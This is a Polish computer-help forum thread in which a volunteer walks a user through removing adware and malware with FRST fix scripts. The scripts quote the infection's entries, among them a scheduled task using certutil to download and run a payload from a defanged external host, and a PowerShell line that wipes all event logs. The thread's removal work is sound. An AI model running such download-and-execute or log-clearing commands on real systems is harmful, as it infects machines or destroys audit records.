adrianho4 Opublikowano 26 Stycznia 2020 Zgłoś Udostępnij Opublikowano 26 Stycznia 2020 Witam, pobrałem program z wirusem. Komputer spowolnił, praktycznie nie da się na nim nic robić. Przeglądarka sama otwiera strony. Proszę o pomoc. Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
jessica Opublikowano 27 Stycznia 2020 Zgłoś Udostępnij Opublikowano 27 Stycznia 2020 1) Spróbuj odinstalować te programy: CloudNet (HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== UWAGA Main service (HKLM-x32\...\{EF758C50-5FA2-4B0A-86D3-8B65B176BC53}) (Version: - ) SafeFinder (HKLM-x32\...\{744A2C8E-3019-4991-96EE-19C53B2BEE77}) (Version: 1.0.0.0 - Linkury) <==== UWAGA SearchNewTab (HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\...\SearchNewTab) (Version: - ) <==== UWAGA 2) Użyj Adw-Cleaner https://www.fixitpc.pl/topic/8-dezynfekcja-zbiór-narzędzi-usuwających/?tab=comments#comment-172741 najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk OCZYŚĆ (CLEANING), to kliknij na niego. Pokaż raport z niego "C" 3) Zrób nowe logi FRST przed skanem zaznacz: Additional.txt Shortcut.txt, jessi Odnośnik do komentarza
adrianho4 Opublikowano 27 Stycznia 2020 Autor Zgłoś Udostępnij Opublikowano 27 Stycznia 2020 1. Mam problem z odinstalowaniem CloudNet po każdym odinstalowaniu on instaluje się ponownie. Przy uruchamianiu systemu załącza się jakiś plik. Otwiera samoczynnie przeglądarkę z syfiastymi stronami. Towarzyszy temu "pikanie" PC. AdwCleaner[C02].txt Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
jessica Opublikowano 27 Stycznia 2020 Zgłoś Udostępnij Opublikowano 27 Stycznia 2020 Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y. Otworzy się Notatnik - wklej do niego: Spoiler DeleteKey: HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet DeleteKey: HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP% FirewallRules: [{1F9811EE-EDDC-4495-947B-891EF08FCD62}] => (Allow) C:\Windows\rss\csrss.exe () [Brak podpisu cyfrowego] C:\Windows\rss\csrss.exe HKLM\...\RunOnce: [uikda5zld3n] => C:\Program Files (x86)\Ticker\5525341.exe [479232 2020-01-26] () [Brak podpisu cyfrowego] RemoveDirectory: C:\Program Files (x86)\Ticker HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\...\Run: [6548709] => C:\Users\user\AppData\Roaming\qaurvgz1uui\2wm3u0dl1mj.exe [574934 2020-01-26] ( ) [Brak podpisu cyfrowego] HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\...\Run: [WG9C4RAQ04LEUEI] => C:\Program Files\QF28OZMIGL\QF28OZMIG.exe [1005568 2020-01-26] (HFKUZ) [Brak podpisu cyfrowego] HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\...\Run: [FrostyWater] => C:\Windows\rss\csrss.exe [3933696 2020-01-26] () [Brak podpisu cyfrowego] <==== UWAGA HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\...\Run: [CloudNet] => C:\Users\user\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-01-27] (EpicNet Inc.) [Brak podpisu cyfrowego] RemoveDirectory: C:\Program Files\QF28OZMIGL RemoveDirectory: C:\Users\user\AppData\Roaming\qaurvgz1uui RemoveDirectory: C:\ProgramData\Voyasollam AppInit_DLLs: C:\ProgramData\Voyasollam\SaoJob.dll => Brak pliku AppInit_DLLs-x32: C:\ProgramData\Voyasollam\Alphala.dll => Brak pliku CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA Task: {1D682ADF-0A4B-4612-9ABC-3E004309492B} - System32\Tasks\{829A9603-F49E-458D-B4D8-58CC4C8C96C3} => C:\Windows\system32\pcalua.exe -a "C:\Users\user\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall Task: {3183AA0E-C225-43F2-8C83-4818436A6227} - System32\Tasks\{24EBC781-1678-4461-9B11-AE9D49660390} => C:\Windows\system32\pcalua.exe -a "C:\Users\user\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall Task: {9C608D0D-C408-459B-9DB3-519D423FEB41} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3933696 2020-01-26] () [Brak podpisu cyfrowego] <==== UWAGA HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxldvM_sEGJZAe-DqZgx189xRt_5doxY4xPMZAtBp5QUw1_moo59G8RH98fc1sH0YcZhKhSAK6IxePVyHZUl7LvZ_4ii2ReOXyLtQCqNLOXrjwC7HjVa0i8vmqwBC4C6up1we0swwJsMSu7FaSPAxVkSN_YduPsgRZGtcohJQeA,,&q={searchTerms} HKU\S-1-5-21-1300007878-1344279745-1222233489-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxldvM_sEGJZAe-DqZgx189xRt_5doxY4xPMZAtBp5QUw1_moo59G8RH98fc1sH0YcZhKhSAK6IxePVyLopSYjpaIJVKfselANCEEwjLUI4jzbESYMikv2WUZY4ahXRbhCVMwJMXwcXiQTAyvDKQMcnwaWgTzqIK3-wDGSgnMng,, R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== UWAGA (zerobajtowy plik/folder) 2020-01-26 23:37 - 2020-01-26 23:37 - 001895382 _____ C:\Users\user\AppData\Local\Apdox.bin 2020-01-26 23:37 - 2020-01-26 23:37 - 000000000 ____D C:\Users\user\AppData\LocalLow\TrashCan 2020-01-26 23:36 - 2020-01-26 23:36 - 008465920 _____ C:\Users\user\AppData\Local\agent.dat 2020-01-26 23:36 - 2020-01-26 23:36 - 002158640 _____ C:\Users\user\AppData\Local\Namfind.tst 2020-01-26 23:36 - 2020-01-26 23:36 - 000126464 _____ C:\Users\user\AppData\Local\noah.dat 2020-01-26 23:36 - 2020-01-26 23:36 - 000126464 _____ C:\Users\user\AppData\Local\lobby.dat 2020-01-26 23:36 - 2020-01-26 23:36 - 000070992 _____ C:\Users\user\AppData\Local\Config.xml 2020-01-26 23:36 - 2020-01-26 23:36 - 000068250 _____ C:\Users\user\AppData\Local\Labdex.tst 2020-01-26 23:36 - 2020-01-26 23:36 - 000044032 _____ C:\Users\user\AppData\Local\ApplicationHosting.dat 2020-01-26 23:36 - 2020-01-26 23:36 - 000005568 _____ C:\Users\user\AppData\Local\md.xml 2020-01-26 23:36 - 2020-01-26 23:35 - 001767424 _____ C:\Users\user\AppData\Local\Namfind.exe 2020-01-26 23:36 - 2020-01-26 23:35 - 001767424 _____ C:\Users\user\AppData\Local\Labdex.exe 2020-01-26 23:35 - 2020-01-26 23:35 - 000140800 _____ C:\Users\user\AppData\Local\installer.dat 2020-01-26 23:34 - 2020-01-26 23:35 - 000000000 ____D C:\Program Files\QF28OZMIGL 2020-01-26 23:34 - 2020-01-26 23:34 - 000000000 ____D C:\Users\user\AppData\Roaming\qaurvgz1uui 2020-01-26 23:34 - 2020-01-26 23:34 - 000000000 ____D C:\Users\user\AppData\Roaming\Python 2020-01-26 23:34 - 2020-01-26 23:34 - 000000000 ____D C:\Program Files (x86)\Ticker Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). Zrób nowe logi FRST. jessi Odnośnik do komentarza
adrianho4 Opublikowano 27 Stycznia 2020 Autor Zgłoś Udostępnij Opublikowano 27 Stycznia 2020 Po uruchomieniu systemu nadal na szybko pojawia się załączenie jakiegoś pliku. I towarzyszy temu "piknięcie". Tak samo jak np. otworzę przeglądarkę. Mam wrażenie, że system samoistnie uruchamia się w trybie awaryjnym, a ja przy uruchamianiu nie mogę tego zmienić bo ekspresowo sam wybiera tryb awaryjny. FRST.txt Shortcut.txt Fixlog.txt Addition.txt Odnośnik do komentarza
jessica Opublikowano 27 Stycznia 2020 Zgłoś Udostępnij Opublikowano 27 Stycznia 2020 Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y. Otworzy się Notatnik - wklej do niego: Spoiler Task: {079B6226-2A66-4E45-9698-4301BD77CAA4} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://theatresearch.xyz/app/app.exe C:\Users\user\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\user\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA C:\Windows\Minidump\012620-11450-01.dmp RemoveDirectory: C:\Users\user\AppData\Roaming\EpicNet Inc 2020-01-26 23:37 - 2020-01-26 23:37 - 000032038 _____ () C:\Users\user\AppData\Local\uninstall_temp.ico EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). ---------------- Cytat Error: (01/28/2020 12:16:41 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Ściągnij MicrosoftFixit50688.msi stąd > http://www.mediafire.com/download/6hwcm6b77098cbb/MicrosoftFixit50688.msi i go uruchom jako Administator. Zrób nowe logi FRST. jessi Odnośnik do komentarza
adrianho4 Opublikowano 27 Stycznia 2020 Autor Zgłoś Udostępnij Opublikowano 27 Stycznia 2020 To pikanie to jednak z głośników dochodzi, przy każdym uruchamianiu chrome XD (da się to jakoś wyłączyć, wcześniej tak nie było), a i nadal po uruchomieniu systemu załącza się na chwilę to okienko (podobne do okienka np. po wpisaniu cmd). FRST.txt Shortcut.txt Fixlog.txt Addition.txt Odnośnik do komentarza
adrianho4 Opublikowano 28 Stycznia 2020 Autor Zgłoś Udostępnij Opublikowano 28 Stycznia 2020 Ten dźwięk: https://www70.zippyshare.com/v/Rrty3mjV/file.html Odnośnik do komentarza
jessica Opublikowano 28 Stycznia 2020 Zgłoś Udostępnij Opublikowano 28 Stycznia 2020 Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y. Otworzy się Notatnik - wklej do niego: Spoiler HKLM-x32\...\Run: [AMD AVT] => Cmd.exe /c start "AMD Accelerated Video Transcoding device initialization" /min "C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe" aml S3 Winmon; C:\Windows\System32\drivers\Winmon.sys [9352 2020-01-26] (WDKTestCert Admin,131480495282941941 -> ) [Brak podpisu cyfrowego] S3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [23272 2020-01-26] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [Brak podpisu cyfrowego] R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-01-27] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego] C:\Windows\System32\drivers\Winmon.sys C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\WinmonProcessMonitor.sys EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). jessi Odnośnik do komentarza
adrianho4 Opublikowano 28 Stycznia 2020 Autor Zgłoś Udostępnij Opublikowano 28 Stycznia 2020 Nadal jest to pikanie przy otwieraniu chroma. Addition.txt FRST.txt Shortcut.txt Fixlog.txt Odnośnik do komentarza
jessica Opublikowano 28 Stycznia 2020 Zgłoś Udostępnij Opublikowano 28 Stycznia 2020 W logach nie ma niczego podejrzanego. Cytat Nadal jest to pikanie przy otwieraniu chroma Teoretycznie najlepszym rozwiązaniem wydaje się całkowite pozbycie się CHROME na zawsze, ale Chrome jest Twoją domyślną przeglądarką, więc może się zdarzyć, że ten sam problem pojawi się na następnej domyślnej przeglądarce, bo prawdopodobnie problem jest wywoływany przez któryś z Twoich programów wymagających połączenia netem, np. przy aktualizacji. Trudno wyczuć, który to program. jessi Odnośnik do komentarza
adrianho4 Opublikowano 28 Stycznia 2020 Autor Zgłoś Udostępnij Opublikowano 28 Stycznia 2020 Ok, a wiesz może coś na temat tego okienka typu jak po wpisaniu cmd ? Pojawia się na chwilę po uruchomieniu systemu i znika. Odnośnik do komentarza
jessica Opublikowano 28 Stycznia 2020 Zgłoś Udostępnij Opublikowano 28 Stycznia 2020 Myślałam, że to już zniknęło, bo to zostało usunięte: Cytat HKLM-x32\...\Run: [AMD AVT] => Cmd.exe /c start "AMD Accelerated Video Transcoding device initialization" /min "C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe" aml Innych przyczyn w logach nie widzę. jessi Odnośnik do komentarza
adrianho4 Opublikowano 28 Stycznia 2020 Autor Zgłoś Udostępnij Opublikowano 28 Stycznia 2020 Ok. Dziękuję bardzo za pomoc oraz poświęcony czas. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się